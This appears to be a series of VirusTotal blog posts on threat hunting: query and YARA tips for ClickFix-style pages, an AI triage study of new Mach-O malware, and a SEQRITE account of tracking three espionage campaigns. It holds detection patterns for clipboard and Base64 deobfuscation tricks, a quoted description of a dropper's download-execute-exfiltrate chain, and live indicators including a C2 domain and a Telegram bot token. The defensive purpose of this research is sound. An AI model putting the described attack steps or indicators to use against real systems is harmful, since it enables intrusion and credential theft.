Secondly, those of us interested in continuing to track this threat and follow its evolution may use this to find these threats and potentially automate detection. As a side note, *Fix attacks are great investigation topics for those of us starting out in security, and as long as appropriate precautions are taken, it can be relatively safely investigated via VT, and can be very useful for learning about malicious commands, phishing sites, etc.
Thirdly, for those of us protecting organizations, this can be a useful guide for finding these attacks by yourself, in the wild, in order to gain a deeper understanding of how they operate, and what relevant ways you can find to defend your organization, although there are certainly many reports written on the subject which would also come in handy.

VT Tips (based on the success story)

[In the words of VirusTotal…]
The Acronis team’s investigation into FileFix, SideWinder, and ShadowVector is a goldmine of threat hunting techniques. Let’s move beyond the narrative and extract some advanced, practical methods you can apply to your own hunts for web-based threats and multi-stage payloads.

Supercharge Your Web-Content YARA Rules

A simple YARA rule looking for clipboard commands and "powershell" is a good start, but attackers know this. You can significantly improve your detection rate by building rules that look for the context in which these commands appear.
Instead of a generic search, try focusing on the obfuscation and page structure common in these attacks. For instance, attackers often hide their malicious script inside other functions or encoded strings. Your YARA rules can hunt for the combination of a clipboard command and indicators of de-obfuscation functions like atob() (for Base64) or String.fromCharCode.
Combine content searches with URL metadata. The content modifier is also available for URLs, when you set the entity to url you can use the content modifier to search for strings within the URL content. For example, the next query can be useful to identify potential ClickFix URLs combining some of the findings shared by Acronis and potential strings used to avoid detections.
entity:url (content:"navigator.clipboard.writeText" or content:"document.execCommand(\"copy\")") (content:"String.fromCharCode" or content:"atob")

Dissect Payloads with Advanced Content Queries

When you find a payload, as Acronis did within the FileFix site's source code, your job has just begun. The next step is to find related samples. Attackers often reuse code, and even when they obfuscate their scripts, unique strings or logic patterns can give them away. Isolate unique, non-generic parts of the script. Look for:
  • Custom function names
  • Specific variable names
  • Uncommon comments
  • Unique sequences of commands or API calls
Focus on the unobfuscated parts of the code. In the FileFix payload, the attackers might obfuscate the C2 domain, but the PowerShell command structure used to decode and run it could be consistent across samples. Use that structure as your pivot. For example, if a payload uses a specific combination of [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...)), you can build a query to find other files using that exact deobfuscation chain.
behavior:"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("

Don't forget about the infrastructure

Acronis has been tracking SideWinder in a very intelligent way. Their experience with VirusTotal is evident. Most of our users use VirusTotal primarily for file analysis, but sometimes we forget that there are powerful features for tracking infrastructure through livehunt.
In the SideWinder intrusions, there is a continuously monitored hash that corresponds to a decoy file, and this file is downloaded from different URLs.
ITW URLs means that these URLs were downloading the file being studied, in this case the RTF decoy file
An interesting way to proactively identify new URLs quickly is by creating a YARA rule in livehunt for URLs, where the objective is to discover new URLs that are downloading that specific RTF decoy file.
import "vt"

rule URLs_Downloading_Decoy_RTF_SideWinder {

  meta:
    target_entity = "url"
    author = "Virustotal"
    description = "This YARA rule identify new URLs downloading the decoy file related to SideWinder"

  condition:
    vt.net.url.downloaded_file.sha256 == "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a" 
    and vt.net.url.new_url
}
Another approach that could also be interesting is to directly query the itw_urls relationship of the decoy file using the API. One use case could be creating a script that regularly (perhaps daily) calls the relationship API, retrieves the URLs, stores them in a database, and then repeats the call each day to identify new URLs. It's a simple, yet effective way to integrate with technology that any company might already have.
The following code snippet can be executed in Google Colab and once you establish the API Key, you will obtain all the itw_urls related to the decoy file in the all_itw_urls variable.
!pip install vt-py nest_asyncio
import getpass, vt, json, nest_asyncio
nest_asyncio.apply()

cli = vt.Client(getpass.getpass('Introduce your VirusTotal API key: '))

FILEHASH = "1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a"
RELATIONS = "itw_urls"
all_itw_urls = []

async for itemobj in cli.iterator(f'/files/{FILEHASH}/{RELATIONS}', limit=0):
    all_itw_urls.append(itemobj.to_dict())

The great forgotten one: VT Diff

When we read researchs using VT Diff, we are pleased, as it is a tool that is truly good for creating YARA rules.
When analyzing a set of related samples, use the VT Diff feature to spot commonalities and variations. This can help you identify patterns, such as repeated strings, hardcoded values, or metadata artifacts that indicate automated generation.
As the Acronis team notes, "We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”)".
You can easily use VT Diff from multiple places: intelligence search results, collections, campaigns, reports, VT Graph…
Creation of VT Diff from a Report

Conclusion

The examples shared by the Acronis Threat Research Unit in tracking campaigns like FileFix, SideWinder, and Shadow Vector demonstrates the power of VT as a comprehensive threat intelligence and hunting platform. By leveraging a combination of proactive Livehunt rules, deep content analysis, and rich metadata pivoting, security researchers can effectively uncover and track elusive and evolving threats.
These examples highlight that successful threat hunting is not just about having the right tools, but about applying creative and persistent investigation techniques. The ability to pivot from a simple YARA rule to a full-fledged campaign analysis, as Acronis did, is crucial to connecting the dots and revealing the full scope of an attack. From hunting for clipboard manipulation in web-based threats to tracking decade-old exploits and analyzing malicious SVG decoys, the Acronis team has demonstrated a deep understanding of modern threat hunting, and we appreciate them sharing their valuable insights with the community.
We hope this blog have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.
If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us, and we will be happy to feature your story in a future blog post at practitioners@virustotal.com.
Together, we can make the digital world a safer place.

Reversing at Scale: AI-Powered Malware Detection for Apple’s Binaries

6 November 2025 at 22:17

TL;DR: We ran our new AI-based Mach-O analysis pipeline in production, no metadata, no prior detections, just raw Apple binaries. On Oct 18, 2025, out of 9,981 first-seen samples, VT Code Insight surfaced multiple real Mac and iOS malware cases that had 0 antivirus detections at submission time, including a multi-stage AppleScript infostealer and an iOS credential-stealing tweak. It also helped identify 30 antivirus false positives, later confirmed and fixed.

By Bernardo Quintero, Tom Bennett, and Paul Tarter

The Challenge: Reversing at Scale

The long-term goal of Code Insight is ambitious but simple to state: use AI to reason about every single file that reaches VirusTotal in real time. That’s more than two million samples a day, so scalability and efficiency aren’t nice-to-haves, they’re requirements.

We started this journey in early 2023 by analyzing small PowerShell scripts under 25 KB, focusing on fast, context-limited reasoning. As Gemini’s token capacity grew, we expanded support to larger files and richer formats: Office documents with macros, PDFs containing embedded objects, and package types such as NPM, SWF, SVG, MCP, CRX, VSIX, etc. Each step pushed the boundaries of what Code Insight could interpret automatically.

Eventually, we reached compiled binaries, by far the most challenging class due to their size, complexity, and low-level structure. Analyzing native code with large language models is not straightforward: Mach-O binaries can be massive, and full decompilation or disassembly often exceeds even the largest model contexts, while being too slow and expensive for a high-volume production pipeline.

To make this feasible, we built a pruning-based summarization layer. Instead of feeding Gemini a full decompilation or noisy disassembly, we first extract the most informative elements: code entry points, key imports and exports, relevant strings, and selected function summaries, using Binary Ninja’s High Level Intermediate Language (HLIL) for native code. The goal isn’t to reconstruct the full program logic, but to preserve just enough structure for meaningful reasoning.

This distilled representation fits comfortably within Gemini’s 1M-token context window and allows us to generate a concise, human-readable analyst summary in a single LLM call, regardless of the binary’s size. It’s a pragmatic balance between depth and scalability, good enough to reason and perform a fast first-pass triage, yet efficient enough to keep up with the continuous flow of new files reaching VirusTotal every day.

The 24-Hour Stress Test

On October 18, 2025, VirusTotal received 9,981 unique Mach-O binaries never seen before by our platform. We ran every single one through our new Code Insight pipeline, using only the raw binary, no external metadata, no crowdsourced intelligence, and no previous antivirus results.

Here’s how the AI’s fully independent analysis compared against the aggregate detections from more than 70 traditional antivirus engines on that same day:

  • Traditional AV Detections: 67 binaries flagged as malicious by one or more engines.
  • Code Insight Detections: 164 binaries identified as malicious.

The absolute numbers are interesting, but the real insight comes from the discrepancies between the two sets.

Clearing the Fog: AI as a False Positive Filter

Manual review confirmed that Code Insight’s explanations were accurate:

  • 30 files were false positives from Microsoft’s engine. Once reported, Microsoft promptly reviewed the cases, confirmed the issue, and updated their signatures on October 31. We appreciate their quick response.
  • 3 files were flagged by ClamAV with the signature Macos.Trojan.CrackedTool. While this label is technically correct within ClamAV’s detection policy (it flags software signed by alternative markets such as MacKed), Code Insight correctly identified that these binaries did not exhibit inherently malicious behavior.

In a Security Operations Center setting, even a single false alert like this could consume hours of analyst time before being cleared. While VirusTotal operates at global scale and aggregates samples from many independent sources, the same pattern applies within any organization’s network: unnecessary alerts create noise and drain resources. Code Insight demonstrated how AI reasoning can help triage these cases faster and more consistently, assisting rather than replacing human judgment.

Finding the Needles: Zero-Day Detections

Beyond filtering false positives, Code Insight also surfaced nearly 100 binaries that traditional engines had missed entirely at the time of analysis. Many of these were indeed suspicious, ranging from keygens and adware to grayware utilities with excessive privileges, such as certain developer e-learning tools or Roblox cheats often distributed outside the App Store.

That said, not every “malicious” verdict was black and white. Because Code Insight analyzes binaries in isolation, without context about their surrounding environment or intended use, it can occasionally err on the side of caution. For instance, one MCP component from the Hopper decompiler was described accurately in terms of behavior (persistent XPC communication, JSON-based client–server protocol, API-like command handlers) but was ultimately benign within its legitimate application context, as an MCP server rather than a malicious persistent C2 channel. In this case, we had an accurate technical description but a false positive in the final verdict issued by Code Insight.

These occasional gray-area cases are part of the natural learning curve for AI-based reasoning systems. Still, the vast majority of Code Insight’s findings were technically sound, and its detailed explanations allowed analysts to make quick, informed decisions based on actual capabilities rather than static signatures.

Among those findings, we also identified several clear-cut cases of undetected malware, confirmed through manual reversing and reproducible behavior. Below we highlight two representative examples, one from macOS and another from iOS, both caught by AI yet completely invisible to traditional defenses on Day 0.

1. Multi-stage macOS Dropper (0 Detections)

SHA-256: 9adef73a6255f6bcb203e84cbe9304d000f3c5354d3d7bf3fc3b2a0128b624c3

Code Insight immediately recognized this binary's hostile intent, describing it as a multi-stage threat. It didn't just flag it, it mapped the attack chain:

"The binary is a multi-stage malware that downloads and executes a second-stage AppleScript payload from a C2 server, and exfiltrates local data. It first connects to https://foggydoxz.xyz/dynamic to download an AppleScript, saves it to /tmp/test.scpt, and executes it using /usr/bin/osascript. Subsequently, it reads /tmp/osalogging.zip and exfiltrates it via a POST request to https://foggydoxz.xyz/gate. The malware also bypasses TLS certificate validation to secure its C2 communication."

Manual reversing confirmed not only the verdict but every detail of this AI-generated assessment.


The screenshot above shows how detections for this sample evolved on VirusTotal over time. When it first arrived on October 18, no antivirus engine flagged it as malicious, yet Code Insight already identified it as a multi-stage macOS dropper. Over the following days, traditional detections gradually caught up: three engines marked it nine days later, and eleven by October 28. This pattern is common for truly novel threats: AI reasoning can expose suspicious behaviors before signatures or reputation systems are updated, offering analysts an early warning window that would otherwise not exist.

2. iOS Jailbreak Tweak with a Phishing Twist (0 Detections)

SHA-256: 333913409c1e22b5da03c762cbb7d99a9d38ecdf0231cb9ac6db00efc6b3bd97

This sample masquerades as a dynamic library for jailbroken iOS devices, claiming to unlock premium features in Adobe Lightroom. Code Insight looked beyond the piracy functionality and uncovered a secondary payload focused on credential theft.

The AI correctly identified that it used method swizzling / hooking not only to bypass subscription checks but also to inject a fake login prompt. It highlighted obfuscation mechanisms used to conceal the exfiltration channel, including a hardcoded, obfuscated Telegram Bot API token and custom cryptographic routines to hide command strings.

Code Insight’s summary read:

"This is an iOS dynamic library (tweak) for jailbroken devices, designed to be injected into the Adobe Lightroom application process. Its primary purpose is to modify the target application's functionality. It exhibits several malicious behaviors: it uses method swizzling (e.g., `sub_41e564`) to hook functions, displays a custom UI overlay on top of the running application, and employs extensive string obfuscation and custom cryptographic routines (e.g., `sub_433b0c`, `sub_415b68`) to hide its functionality. Key IOCs include the installation path `/Library/MobileSubstrate/DynamicLibraries/Lightroom.dylib` and a URL to a Telegram channel (`https://t[.]me/blatants]`), likely used for C2 or distribution. These characteristics are consistent with malware designed for piracy, credential theft, or phishing within the context of the compromised host application."

A manual reverse-engineering review by an expert confirmed, and expanded on the AI’s assessment. The human analysis described the sample as a malicious dynamic library that functions as a dual-purpose tool: (1) it uses method hooking to bypass Lightroom’s premium-feature checks (by replacing subscription validation routines to always return success), and (2) it implements a phishing capability that displays a convincing fake login prompt to capture Adobe credentials. The stolen credentials are then exfiltrated via an obfuscated Telegram Bot API token and Chat ID, with string obfuscation and lightweight crypto used to hide the Telegram URL and tokens. In short: the manual review corroborated the AI’s technical description and confirmed the end-to-end exfiltration mechanism.


The VirusTotal report below shows the status of this sample not only at the time it was first analyzed on October 18, but also as of November 3, more than two weeks later. No antivirus engine has flagged it as malicious to date.

Moreover, on the same day this sample was analyzed, Code Insight detected multiple other binaries using the same injection framework, suggesting an organized campaign rather than an isolated specimen.

Further investigation of the Telegram channel referenced in the IOCs (https://t[.]me/blatants) revealed that it hosts a large-scale operation called Blatant’s iPA Library, boasting more than 38,000 subscribers. The group distributes automation bots (InjectBot, PatchBot, PaidAppScraper, and FileDownloader) that advertise the ability to inject .dylib payloads into iOS .ipa apps, patch premium features, and share modified packages. This infrastructure perfectly matches the behaviors described in the AI-generated report and confirmed through manual reversing: a dual-purpose ecosystem for app piracy and credential theft, powered by Telegram’s bot API.

These examples illustrate both the power and practicality of AI-driven reversing. Even without context or prior knowledge, the model can reason through complex binaries, extract intent, and expose behaviors that remain invisible to static or signature-based methods.

The Pragmatic Reality

This work is not about replacing traditional detection engines, it’s about complementing them and covering their blind spots at a scale human teams simply can’t match.

Until recently, reverse engineering and in-depth code analysis were tasks reserved for human analysts. Even in large-scale operations, fewer than 1% of new files ever underwent that level of scrutiny, simply because manual reversing doesn’t scale. Yet those are precisely the samples that tend to slip past signature or ML-based detections, the truly novel threats.

By autonomously performing this kind of junior-analyst–level reasoning across millions of files daily, VT Code Insight brings that deeper layer of understanding to every new sample, not just the few that would normally reach a human analyst’s desk.

It’s a pragmatic shift: AI reasoning where it scales, human expertise where it matters most, helping defenders see further, faster, and with greater context than ever before.

November is the Month of Searches: Explore, Learn, and Share with #MonthOfVTSearch

3 November 2025 at 17:05
This November, we’re celebrating the power of VirusTotal Enterprise search!
All VirusTotal customers will enjoy uncapped searches through the GUI — no quota consumption for the entire month so long as it is manual searches via the web interface.
Whether you’re investigating malware campaigns, analyzing infrastructure, or tracking threat actor activity, this is your chance to search freely and explore advanced use cases using VirusTotal Intelligence.
Experiment with powerful VT search modifiers to uncover patterns, hunt for related samples, and pivot across hashes, domains, IP addresses, or URLs — without worrying about your quota.

What’s happening

  • No quota consumption for all GUI searches during November (API interaction will continue to consume).
  • Every day, we’ll share interesting and creative search queries on our LinkedIn and X channels using the hashtag #MonthOfVTSearch.
  • We invite you to try these searches, interact with us, and share your own search tips and findings with the community.

Learn and level up

Make the most of this month to sharpen your threat-hunting skills:

Example: Day 1 Search Query

To kick off #MonthOfVTSearch, here’s the first advanced query we’re sharing with the community:

What this query does:

This search helps identify document files that, when executed in a sandbox environment, show behavior consistent with potential malicious activity involving .ru infrastructure. It specifically looks for:
  • Documents (type:document) that were uploaded to VT.
  • During execution, they show process behavior containing:
    • HTTP traffic (behavior_processes:*http*)
    • The string DavSetCookie (often observed in HTTP request headers or custom cookie operations)
    • And references to .ru domains
  • And additionally, they show network or embedded indicators related to .ru domains via:
    • Behavior-based network connections (behavior_network:*.ru*), or
    • Embedded domains or URLs within the file (embedded_domain:*.ru*, embedded_url:*.ru*)

Join the community

Let’s make November a month of discovery and collaboration! Tag your posts with #MonthOfVTSearch, share your favorite searches, and show the world how you use VirusTotal to explore and understand the threat landscape.
In the meantime, if you have any feedback you can contact us.

Hugging Face and VirusTotal: Building Trust in AI Models

23 October 2025 at 09:41

We’re happy to announce a collaboration with Hugging Face, an open platform that fosters collaboration and transparency in AI, to make security insights more accessible to the community. VirusTotal’s analysis results are now integrated directly into the Hugging Face platform, helping users understand potential risks in model files, datasets, and related artifacts before they download them.

Security context where you need it

When you browse a file on Hugging Face, you’ll now see security information coming from different scanners, including VirusTotal results. In the example below, VirusTotal detects the file as unsafe and links directly to its public report for full details.

Addressing new challenges

As AI adoption grows, we see familiar threats taking new forms, from tampered model files and unsafe dependencies to data poisoning and hidden backdoors. These risks are part of the broader AI supply chain challenge, where compromised models, scripts, or datasets can silently affect downstream applications.

At VirusTotal, we’re also evolving to meet the challenges of this new landscape. We’re developing AI-driven analysis tools such as Code Insight, which uses LLMs to understand and explain code behavior, and we’re adding support for specialized tools for model/serialization formats, including picklescan, safepickle, and ModelScan, to help surface risky patterns and unsafe deserialization flows.

Our collaboration with Hugging Face strengthens this effort. By connecting VirusTotal’s analysis with Hugging Face’s AI Hub, we can expand our research into threats targeting AI models and share that visibility across the industry, helping everyone build better defenses, tools, and approaches to improve global security.

Stronger together

This collaboration is part of our ongoing mission to make security intelligence simpler and more accessible. It follows our recent effort to streamline VirusTotal access and API usage for the community, and now extends that same spirit into the AI space.

We believe that openness, collaboration, and shared knowledge are the best defenses against evolving threats. Hugging Face and VirusTotal share that vision: empowering researchers, developers, and defenders worldwide to build safely and openly.

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

21 October 2025 at 10:40

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.
That's why we're so excited to start a new blog series where we'll be sharing success stories from some of our customers. They'll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.
To kick things off, we're thrilled to have our friends from SEQRITE join us. Their APT-Team is full of incredible threat hunters, and they've got a great story to share about how they've used VT to track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.
VT is more than just a tool for checking if a file is malicious. It's a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It's this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite - Success Story

[In the words of SEQRITE…]
We at SEQRITE APT-Team perform a lot of activities, including threat hunting and threat intelligence, using customer telemetry and multiple other data corpuses. Without an iota of doubt, apart from our customer telemetry, the VT corpus has aided us a decent amount in converting our research, which includes hunting unique campaigns and multiple pivots that have led us to an interesting set of campaigns, ranging across multiple spheres of Asian geography, including Central, South, and East Asia.

UNG0002

SEQRITE APT-Team have been tracking a south-east asian threat entity, which was termed as UNG0002, using certain behavioral artefacts, such using similar OPSEC mistakes across multiple campaigns and using similar set of decoys and post-exploitation toolkit across multiple operational campaigns ranging from May 2024 to May 2025.
During the initial phase of this campaign, the threat actor performed multiple targets across Hong Kong and Pakistan against sectors involving defence, electrotechnical, medical science, academia and much more.
VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.
Using the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14 different samples, all of them related to the campaign with this query
VirusTotal query: metadata:"2015:07:10 03:27:31+00:00" filename:"imebroker.exe"

based on the configuration extracted by VT, we could use the public key extracted to identify more samples using exactly the same with the following query
malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Besides these executables, we mentioned that there were also LNK files within the ZIP files. After analyzing them, a consistent LNK-ID metadata revealed the same identifiers across many samples. Querying VT for those LNK-IDs exposed we could identify new files related to the campaign.
VirusTotal query: metadata:"laptop-g5qalv96"

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.
While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we're officially labeling Operation AmberMist.
Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.
Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.
By developing a simple yet effective hunting query, we were able to uncover a previously unseen sample not publicly reported:
type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK
VirusTotal query: type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

Silent Lynx

Another campaign tracked by the SEQRITE APT-team, named Silent Lynx, targeted multiple sectors including banking. As in the previous described case, thanks to VT we were able to pivot and identify new samples associated with this campaign.
Initial Discovery and Pivoting
During the initial phase of this campaign, we discovered a decoy-based SPECA-related archive file targeting Kyrgyzstan around December 2024 - January 2025. The decoy was designed to distract from the real payload: a malicious C++ implant.
Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic
Email identified during our reserach

We performed multiple pivots focusing on the implant, starting by analyzing the sample’s metadata and network indicators and functionalities, we found that the threat actor had been using a similar C++ implant, which led us to another campaign targeting the banking sector of Kyrgyzstan related to Silent Lynx too.
Information obtained during the analysis of the C++ implants

Information obtained during the analysis of the C++ implants

We leveraged VT corpus for deploying multiple Livehunt rules on multiple junctures, some of the simpler examples are as follows:
  • Looking at the usage of encoded Telegram Bot based payload inside the C++ implant. Using either content or malware_config modifiers when extracted from the config could help us to identify new samples.

  • Spawning Powershell.exe LOLBIN.

  • VT search enablers for checking for malicious email files, if uploaded from Central Asian Geosphere.

  • ISO-oriented first-stagers.

  • Multiple behavioral overlaps between YoroTrooper & Silent Lynx and further hunting hypothesis developed by us. 

Leveraging VT corpus and using further pivots on the above metrics and many others included on the malicious spear-phishing email, we also tracked some further campaigns. Most importantly, we developed a new YARA rule and a new hypothesis every time to hunt for similar implants leveraging the Livehunt feature depending on the tailored specifications and the raw data we received during hunting keeping in mind the cases of false positives and false negatives.
Decoy document identified during our hunting activities

Submissions identified in the decoy document

The threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan and Turkmenistan. Using hunting queries through VT along with submitter:UZ or submitter:TM helped us to identify these samples.
The most important pivot in our investigation was the malware sample itself as shown in the previous screenshots was the usage of encoded PowerShell blob spawning powershell.exe, which was used multiple times across different campaigns. This sample acted as a key indicator, allowing us to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of the actor's operations.
Also, thanks to VT feature of collections, we further leveraged it to build an attribution of the threat entity.
Collections used during the attribution process

DragonClone

Finally, the last campaign that we wanted to illustrate how pivoting within the VT ecosystem enabled our team to uncover new samples was by a group we named DRAGONCLONE
The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.
Initial Discovery
Recently, on 13th May, our team discovered a malicious ZIP file that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector and contained multiple EXE and DLL files inside the archive, like this one which contains the malicious payload.
Chinese-based threat actors have a well-known tendency to deliver DLL sideloading implants as part of their infection chains. Leveraging crowdsourced Sigma rules in VT, along with personal hunting techniques using static YARA signatures, we were able to track and hunt this malicious spear-phishing attachment effectively. In their public Sigma Rules list you can find different Sigma Rules that are created to identify DLL SideLoading.
Pivoting Certificates via VT Corpus
While exploring the network of related artifacts, we could not initially find any direct commonalities. However, a particular clean-looking executable named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper investigation.
Certificates are one of the most key indicators, while looking into malicious artefacts, we saw that it is a fresh and clean copy of WonderShare’s Repairit Software, a well known software for repairing corrupted files, whereas a suspicious concern is that it has been signed by ShenZhen Thunder NetWorking Technologies Ltd
VirusTotal query: signature:"ShenZhen Thunder Networking Technologies Ltd."

Using this hunch, we discovered and hunted for executables, which have been signed by similar and found there have been multiple malicious binaries, although, this has not been the only indicator or pivot, but a key one, to research for further ones.
Pivoting on Malware Configs via VT Corpus
We analyzed the loader and determined it's slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.
After extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe. By leveraging the VT corpus to pivot on this finding, we were able to identify additional V-Shell implant samples potentially linked to this campaign.
VirusTotal query: malware_config:"qwe123qwe"

VT Tips (based on the success story)

[In the words of VirusTotal…]
Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we'll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.
For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:"qwe123qwe" in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. That's thanks to Backscatter. We've written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for samples by family name like malware_config:"redline" up to Telegram tokens and even URLs configured in the malware configuration like malware_config:"https://steamcommunity.com/profiles/76561198780612393".

Don't Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker's machine, such as the hostname.
In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. We know that this information can be also modified by them to deceive security researchers, but often we observe good information that can be used to track them. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string.

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the "Silent Lynx" campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.
These tokens can be extracted from memory dumps during sandbox execution or from the malware's code itself. Once you have a token, you may be able to track the threat actor's commands and even identify other victims, as was done in the Silent Lynx investigation. A concrete example of using Telegram bot tokens is the query malware_config:"bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8", which is associated with four infostealer samples uploaded between 2024 and 2025.

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.
In the DRAGONCLONE case, a suspicious executable was signed by "ShenZhen Thunder Networking Technologies Ltd.". By searching for other files signed with the same certificate (signature:"ShenZhen Thunder Networking Technologies Ltd."), you can uncover other tools in the attacker's arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the "Silent Lynx" campaign for hunting similar implants.
Additionally, you can leverage the power of the community by using crowdsourced Sigma rules in VirusTotal, even within your YARA rules. These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by DRAGONCLONE, directly from sandbox execution data.
For example, If you want to search for the Sigma rule "Potential DLL Sideloading Of MsCorSvc.DLL" in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.
These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.
We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.
If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us, and we will be happy to feature your story in a future blog post at practitioners@virustotal.com.
Together, we can make the digital world a safer place.

Simpler Access for a Stronger VirusTotal

8 October 2025 at 18:17

VirusTotal (VT) was founded on a simple principle: we are all stronger when we work together. Every file shared, every engine integrated, and every rule contributed strengthens our collective defense against cyber threats.

In the spirit of that collaboration, and in light of recent community discussions, we want to share our vision for the future of the platform. We have heard your feedback on the need for simplicity and accessibility, and we are taking action. VT will continue to be broadly available with straightforward options, including a robust free tier for our contributors and community.

Our commitment is to ensure the long-term health and openness of the platform. To do that, we are focused on three key goals:

  • Preserve VT as an open, collaborative platform built for the common good.
  • Provide our contributors with a reliable, cost-effective, and long-term framework for partnership.
  • Improve access to advanced features for academics, researchers, and defenders dedicated to public service.

